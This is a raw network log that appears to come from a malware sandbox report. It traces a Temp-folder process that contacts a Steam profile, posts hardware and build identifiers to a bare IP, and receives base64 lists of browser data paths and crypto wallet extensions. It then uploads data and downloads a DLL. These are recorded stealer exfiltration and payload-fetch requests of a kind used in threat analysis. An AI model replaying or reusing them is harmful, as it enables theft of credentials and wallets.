                                                                      2024-05-26 08:28:47 UTC15331OUTData Raw: 9b 46 da 6b 0e ea 99 7c 91 ce 23 27 23 e8 2f 6f 4a 4e 98 5a 7e 8a e6 df e0 f3 21 a0 6b af a3 09 67 f8 af 49 0a 3a ce eb d3 04 be da ff df 4b 6f ac e3 f4 4e 66 42 7c 4c 62 d9 4e 43 5e e6 5d 35 2f 41 c4 1b b3 e8 b1 c6 44 c0 b0 3b 0a f2 0f cf a8 40 f9 bf cc 98 ee 0e c3 17 af 7e 11 ad dc 79 b3 98 ad 81 80 c8 2f ae a9 a7 bd 59 57 f3 c3 19 09 f9 4b 35 13 2e 53 f0 44 6d 13 a9 02 ad 2e 60 d9 ba 23 f4 28 0c c3 d4 a0 18 b5 42 53 9c b7 fb f5 e5 22 95 94 09 00 3b 39 7a c7 f9 1b 43 be b3 03 3d 3d a4 0f b8 ce 1f 18 ad 09 ef b9 2d e0 18 b4 f0 6a de 5e 85 d8 42 cf f2 18 ac 94 1b 2c b9 eb 92 2f b6 30 10 26 15 e9 dd ac dc 31 b6 54 ac 4d 8f a2 d6 cd 7a e4 85 20 dc 0b 18 fb 73 7d ec 15 61 10 e2 3d 37 2b 0f 87 f9 41 af 35 93 26 3e ec 49 81 45 1d 3f 51 25 59 b3 7d 15 dc f7 92
                                                                      Data Ascii: Fk|#'#/oJNZ~!kgI:KoNfB|LbNC^]5/AD;@~y/YWK5.SDm.`#(BS";9zC==-j^B,/0&1TMz s}a=7+A5&>IE?Q%Y}
                                                                      2024-05-26 08:28:51 UTC810INHTTP/1.1 200 OK
                                                                      Date: Sun, 26 May 2024 08:28:51 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Set-Cookie: PHPSESSID=ik5hsvdi3urobr434kdn145jb4; expires=Thu, 19-Sep-2024 02:15:29 GMT; Max-Age=9999999; path=/
                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                      Pragma: no-cache
                                                                      CF-Cache-Status: DYNAMIC
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sXNz%2FOaprK8hkOCjl5NK3AGIIbjvmKhRapFpJA5uuLe1TfhUGPBIoMzH%2B29tl4BPKukrTP%2F79GWlSeTSCKmjPoSFODd8BuCcXt3jgsHFD5Md5Rs22eDlldNDoYjZet1mBcxQKVrINmlLgak%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 889c64cadef10f73-EWR
                                                                      alt-svc: h3=":443"; ma=86400


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      8192.168.2.44976723.199.218.334434480C:\Users\user\AppData\Local\Temp\katB4C0.tmp
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-05-26 08:29:01 UTC119OUTGET /profiles/76561199689717899 HTTP/1.1
                                                                      Host: steamcommunity.com
                                                                      Connection: Keep-Alive
                                                                      Cache-Control: no-cache
                                                                      2024-05-26 08:29:01 UTC1882INHTTP/1.1 200 OK
                                                                      Server: nginx
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https:// [TRUNCATED]
                                                                      Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                      Cache-Control: no-cache
                                                                      Date: Sun, 26 May 2024 08:29:01 GMT
                                                                      Content-Length: 35682
                                                                      Connection: close
                                                                      Set-Cookie: sessionid=b7805721f538079cf89cccf2; Path=/; Secure; SameSite=None
                                                                      Set-Cookie: steamCountry=US%7C493458b59285f9aa948bf050e0c9a39b; Path=/; Secure; HttpOnly; SameSite=None
                                                                      2024-05-26 08:29:01 UTC14502INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c
                                                                      Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
                                                                      2024-05-26 08:29:02 UTC10074INData Raw: 6c 61 73 73 3d 22 73 75 62 6d 65 6e 75 69 74 65 6d 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 64 69 73 63 75 73 73 69 6f 6e 73 2f 22 3e 0d 0a 09 09 09 09 09 09 09 44 69 73 63 75 73 73 69 6f 6e 73 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 73 75 62 6d 65 6e 75 69 74 65 6d 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 77 6f 72 6b 73 68 6f 70 2f 22 3e 0d 0a 09 09 09 09 09 09 09 57 6f 72 6b 73 68 6f 70 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 73 75 62
                                                                      Data Ascii: lass="submenuitem" href="https://steamcommunity.com/discussions/">Discussions</a><a class="submenuitem" href="https://steamcommunity.com/workshop/">Workshop</a><a class="sub
                                                                      2024-05-26 08:29:02 UTC11106INData Raw: 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 46 52 4f 4d 5f 57 45 42 26 71 75 6f 74 3b 3a 74 72 75 65 2c 26 71 75 6f 74 3b 57 45 42 53 49 54 45 5f 49 44 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 43 6f 6d 6d 75 6e 69 74 79 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 42 41 53 45 5f 55 52 4c 5f 53 48 41 52 45 44 5f 43 44 4e 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 73 68 61 72 65 64 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 43 4c 41 4e 5f 43 44 4e 5f 41 53 53 45 54 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 63 6c 61 6e 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c
                                                                      Data Ascii: &quot;,&quot;FROM_WEB&quot;:true,&quot;WEBSITE_ID&quot;:&quot;Community&quot;,&quot;BASE_URL_SHARED_CDN&quot;:&quot;https:\/\/shared.cloudflare.steamstatic.com\/&quot;,&quot;CLAN_CDN_ASSET_URL&quot;:&quot;https:\/\/clan.cloudflare.steamstatic.com\/&quot;,


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      9192.168.2.44976865.109.242.594434480C:\Users\user\AppData\Local\Temp\katB4C0.tmp
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-05-26 08:29:03 UTC186OUTGET / HTTP/1.1
                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                      Host: 65.109.242.59
                                                                      Connection: Keep-Alive
                                                                      Cache-Control: no-cache
                                                                      2024-05-26 08:29:03 UTC158INHTTP/1.1 200 OK
                                                                      Server: nginx
                                                                      Date: Sun, 26 May 2024 08:29:03 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      2024-05-26 08:29:03 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      10192.168.2.44977165.109.242.594434480C:\Users\user\AppData\Local\Temp\katB4C0.tmp
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-05-26 08:29:04 UTC278OUTPOST / HTTP/1.1
                                                                      Content-Type: multipart/form-data; boundary=----GCGCBAECFCAKKEBFCFII
                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                      Host: 65.109.242.59
                                                                      Content-Length: 278
                                                                      Connection: Keep-Alive
                                                                      Cache-Control: no-cache
                                                                      2024-05-26 08:29:04 UTC278OUTData Raw: 2d 2d 2d 2d 2d 2d 47 43 47 43 42 41 45 43 46 43 41 4b 4b 45 42 46 43 46 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 41 32 33 42 45 30 42 42 36 32 38 39 39 32 32 34 37 36 36 34 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 2d 31 31 65 65 2d 38 63 31 38 2d 38 30 36 65 36 66 36 65 36 39 36 33 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 43 42 41 45 43 46 43 41 4b 4b 45 42 46 43 46 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 32 64 30 36 31 38 33 30 34 61 38 38 64 36 34 37 36 62 63 35 35 64 33 33 63 32 33 64 37 65 36 0d 0a 2d 2d 2d 2d 2d 2d 47
                                                                      Data Ascii: ------GCGCBAECFCAKKEBFCFIIContent-Disposition: form-data; name="hwid"7A23BE0BB628992247664-a33c7340-61ca-11ee-8c18-806e6f6e6963------GCGCBAECFCAKKEBFCFIIContent-Disposition: form-data; name="build_id"42d0618304a88d6476bc55d33c23d7e6------G
                                                                      2024-05-26 08:29:05 UTC158INHTTP/1.1 200 OK
                                                                      Server: nginx
                                                                      Date: Sun, 26 May 2024 08:29:05 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      2024-05-26 08:29:05 UTC69INData Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 66 39 35 38 37 30 62 66 64 35 38 33 62 35 61 61 32 39 38 39 35 33 37 63 66 30 33 35 31 30 34 37 7c 31 7c 31 7c 31 7c 31 7c 31 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 3a1|1|1|1|f95870bfd583b5aa2989537cf0351047|1|1|1|1|1|50000|10


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      11192.168.2.44977265.109.242.594434480C:\Users\user\AppData\Local\Temp\katB4C0.tmp
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-05-26 08:29:06 UTC278OUTPOST / HTTP/1.1
                                                                      Content-Type: multipart/form-data; boundary=----AAEHDAAKEHJECBFHCBKF
                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                      Host: 65.109.242.59
                                                                      Content-Length: 331
                                                                      Connection: Keep-Alive
                                                                      Cache-Control: no-cache
                                                                      2024-05-26 08:29:06 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 41 41 45 48 44 41 41 4b 45 48 4a 45 43 42 46 48 43 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 39 35 38 37 30 62 66 64 35 38 33 62 35 61 61 32 39 38 39 35 33 37 63 66 30 33 35 31 30 34 37 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 48 44 41 41 4b 45 48 4a 45 43 42 46 48 43 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 32 64 30 36 31 38 33 30 34 61 38 38 64 36 34 37 36 62 63 35 35 64 33 33 63 32 33 64 37 65 36 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 48 44 41 41 4b 45 48 4a 45 43 42 46 48 43 42 4b 46 0d 0a 43 6f 6e 74
                                                                      Data Ascii: ------AAEHDAAKEHJECBFHCBKFContent-Disposition: form-data; name="token"f95870bfd583b5aa2989537cf0351047------AAEHDAAKEHJECBFHCBKFContent-Disposition: form-data; name="build_id"42d0618304a88d6476bc55d33c23d7e6------AAEHDAAKEHJECBFHCBKFCont
                                                                      2024-05-26 08:29:06 UTC158INHTTP/1.1 200 OK
                                                                      Server: nginx
                                                                      Date: Sun, 26 May 2024 08:29:06 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      2024-05-26 08:29:06 UTC1564INData Raw: 36 31 30 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 64 76 62 32 64 73 5a 53 42 44 61 48 4a 76 62 57 55 67 51 32 46 75 59 58 4a 35 66 46 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 4e 34 55 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4e 6f 63 6d 39 74 61 58 56 74 66 46 78 44 61 48 4a 76 62 57 6c 31 62 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 46 52 76 63 6d 4e 6f 66 46 78 55 62 33 4a 6a 61 46 78 56 63 32 56 79 49 45
                                                                      Data Ascii: 610R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIE


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      12192.168.2.44977365.109.242.594434480C:\Users\user\AppData\Local\Temp\katB4C0.tmp
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-05-26 08:29:07 UTC278OUTPOST / HTTP/1.1
                                                                      Content-Type: multipart/form-data; boundary=----BAKEBAFIIECBGCAAAAFC
                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                      Host: 65.109.242.59
                                                                      Content-Length: 331
                                                                      Connection: Keep-Alive
                                                                      Cache-Control: no-cache
                                                                      2024-05-26 08:29:07 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 42 41 4b 45 42 41 46 49 49 45 43 42 47 43 41 41 41 41 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 39 35 38 37 30 62 66 64 35 38 33 62 35 61 61 32 39 38 39 35 33 37 63 66 30 33 35 31 30 34 37 0d 0a 2d 2d 2d 2d 2d 2d 42 41 4b 45 42 41 46 49 49 45 43 42 47 43 41 41 41 41 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 32 64 30 36 31 38 33 30 34 61 38 38 64 36 34 37 36 62 63 35 35 64 33 33 63 32 33 64 37 65 36 0d 0a 2d 2d 2d 2d 2d 2d 42 41 4b 45 42 41 46 49 49 45 43 42 47 43 41 41 41 41 46 43 0d 0a 43 6f 6e 74
                                                                      Data Ascii: ------BAKEBAFIIECBGCAAAAFCContent-Disposition: form-data; name="token"f95870bfd583b5aa2989537cf0351047------BAKEBAFIIECBGCAAAAFCContent-Disposition: form-data; name="build_id"42d0618304a88d6476bc55d33c23d7e6------BAKEBAFIIECBGCAAAAFCCont
                                                                      2024-05-26 08:29:08 UTC158INHTTP/1.1 200 OK
                                                                      Server: nginx
                                                                      Date: Sun, 26 May 2024 08:29:08 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      2024-05-26 08:29:08 UTC5605INData Raw: 31 35 64 38 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62
                                                                      Data Ascii: 15d8TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      13192.168.2.44977465.109.242.594434480C:\Users\user\AppData\Local\Temp\katB4C0.tmp
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-05-26 08:29:09 UTC278OUTPOST / HTTP/1.1
                                                                      Content-Type: multipart/form-data; boundary=----JEBGCBAFCGDAAKFIDGIE
                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                      Host: 65.109.242.59
                                                                      Content-Length: 332
                                                                      Connection: Keep-Alive
                                                                      Cache-Control: no-cache
                                                                      2024-05-26 08:29:09 UTC332OUTData Raw: 2d 2d 2d 2d 2d 2d 4a 45 42 47 43 42 41 46 43 47 44 41 41 4b 46 49 44 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 39 35 38 37 30 62 66 64 35 38 33 62 35 61 61 32 39 38 39 35 33 37 63 66 30 33 35 31 30 34 37 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 47 43 42 41 46 43 47 44 41 41 4b 46 49 44 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 32 64 30 36 31 38 33 30 34 61 38 38 64 36 34 37 36 62 63 35 35 64 33 33 63 32 33 64 37 65 36 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 47 43 42 41 46 43 47 44 41 41 4b 46 49 44 47 49 45 0d 0a 43 6f 6e 74
                                                                      Data Ascii: ------JEBGCBAFCGDAAKFIDGIEContent-Disposition: form-data; name="token"f95870bfd583b5aa2989537cf0351047------JEBGCBAFCGDAAKFIDGIEContent-Disposition: form-data; name="build_id"42d0618304a88d6476bc55d33c23d7e6------JEBGCBAFCGDAAKFIDGIECont
                                                                      2024-05-26 08:29:10 UTC158INHTTP/1.1 200 OK
                                                                      Server: nginx
                                                                      Date: Sun, 26 May 2024 08:29:10 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      2024-05-26 08:29:10 UTC119INData Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      14192.168.2.44977565.109.242.594434480C:\Users\user\AppData\Local\Temp\katB4C0.tmp
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-05-26 08:29:10 UTC279OUTPOST / HTTP/1.1
                                                                      Content-Type: multipart/form-data; boundary=----GCBGIIECGHCAKECAFBFH
                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                      Host: 65.109.242.59
                                                                      Content-Length: 7497
                                                                      Connection: Keep-Alive
                                                                      Cache-Control: no-cache
                                                                      2024-05-26 08:29:10 UTC7497OUTData Raw: 2d 2d 2d 2d 2d 2d 47 43 42 47 49 49 45 43 47 48 43 41 4b 45 43 41 46 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 39 35 38 37 30 62 66 64 35 38 33 62 35 61 61 32 39 38 39 35 33 37 63 66 30 33 35 31 30 34 37 0d 0a 2d 2d 2d 2d 2d 2d 47 43 42 47 49 49 45 43 47 48 43 41 4b 45 43 41 46 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 32 64 30 36 31 38 33 30 34 61 38 38 64 36 34 37 36 62 63 35 35 64 33 33 63 32 33 64 37 65 36 0d 0a 2d 2d 2d 2d 2d 2d 47 43 42 47 49 49 45 43 47 48 43 41 4b 45 43 41 46 42 46 48 0d 0a 43 6f 6e 74
                                                                      Data Ascii: ------GCBGIIECGHCAKECAFBFHContent-Disposition: form-data; name="token"f95870bfd583b5aa2989537cf0351047------GCBGIIECGHCAKECAFBFHContent-Disposition: form-data; name="build_id"42d0618304a88d6476bc55d33c23d7e6------GCBGIIECGHCAKECAFBFHCont
                                                                      2024-05-26 08:29:11 UTC158INHTTP/1.1 200 OK
                                                                      Server: nginx
                                                                      Date: Sun, 26 May 2024 08:29:11 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      2024-05-26 08:29:11 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 2ok0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      15192.168.2.44977665.109.242.594434480C:\Users\user\AppData\Local\Temp\katB4C0.tmp
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-05-26 08:29:12 UTC194OUTGET /sqls.dll HTTP/1.1
                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                      Host: 65.109.242.59
                                                                      Connection: Keep-Alive
                                                                      Cache-Control: no-cache
                                                                      2024-05-26 08:29:13 UTC248INHTTP/1.1 200 OK
                                                                      Server: nginx
                                                                      Date: Sun, 26 May 2024 08:29:12 GMT
                                                                      Content-Type: application/octet-stream
                                                                      Content-Length: 2459136
                                                                      Last-Modified: Fri, 24 May 2024 10:18:21 GMT
                                                                      Connection: close
                                                                      ETag: "6650696d-258600"
                                                                      Accept-Ranges: bytes
                                                                      2024-05-26 08:29:13 UTC16136INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1e d2 37 9f 5a b3 59 cc 5a b3 59 cc 5a b3 59 cc 11 cb 5a cd 6e b3 59 cc 11 cb 5c cd cf b3 59 cc 11 cb 5d cd 7f b3 59 cc 11 cb 58 cd 59 b3 59 cc 5a b3 58 cc d8 b3 59 cc 4f cc 5c cd 45 b3 59 cc 4f cc 5d cd 55 b3 59 cc 4f cc 5a cd 4c b3 59 cc 6c 33 5d cd 5b b3 59 cc 6c 33 59 cd 5b b3 59 cc 6c 33 a6 cc 5b b3 59 cc 6c 33 5b cd 5b b3 59 cc 52 69 63 68 5a b3 59 cc 00 00 00 00 00 00 00
                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$7ZYZYZYZnY\Y]YXYYZXYO\EYO]UYOZLYl3][Yl3Y[Yl3[Yl3[[YRichZY
